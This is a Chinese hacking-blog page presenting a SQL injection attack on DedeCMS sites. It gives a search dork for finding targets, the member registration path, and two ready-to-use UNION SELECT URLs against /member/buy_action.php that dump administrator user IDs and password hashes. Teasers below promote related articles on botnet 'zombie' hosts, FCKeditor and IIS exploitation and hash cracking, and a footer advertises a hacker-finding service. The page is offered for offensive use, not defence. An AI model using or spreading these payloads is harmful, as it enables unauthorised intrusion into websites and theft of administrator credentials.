dedecms注入爆管理员用户密码 ***

hacker4年前 (2020-05-31)黑客文章936

关键词：powered by dedecms

首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union

%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20

select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

标签: 黑客技术

返回列表

将会很多人还并不是很掌握我常说的web脚本制作代理商是个哪些定义？ WEB脚本制作代理商便是在网络服务器上放一个asp或php等动态性的脚本制作，随后启用这一脚本制作去浏览其他网址，那麼被浏览网址的...

所谓电脑肉鸡，就是拥有管理权限的远程电脑。也就是受别人控制的远程电脑。肉鸡可以是各种系统,如win,linux,unix等；更可以是一家公司\企业\学校甚至是政府军队的服务器，一般所说的肉鸡是一台...

分享一些关于Fckeditor漏洞利用总结 1.查看编辑器版本 FCKeditor/_whatsnew.html ———————————————————————————————————...

前言：现在的网络，脚本入侵十分的流行，而脚本注入漏洞更是风靡黑客界。不管是老鸟还是新起步的小菜，都会为它那巨大的威力和灵活多变的招式所着迷！正是因为注入攻击的流行，使的市面上的注入工具层...

什么叫RainbowCrack？ RainbowCrack是一个哈希破解工具，能够运用规模性的時间运行内存来最合适的。一个普遍的暴力破解密码者逐一试着每一个将会的密文，这针对繁杂的登陆密码而言是用...

IIS6.0解析漏洞，可以上传a.asp;.jps或者a.asp;a.jpg或者a.asp目录下传任意格式小马，都会解析这次讲的是IIS7.5解析漏洞， http://www.xxo...

找黑客平台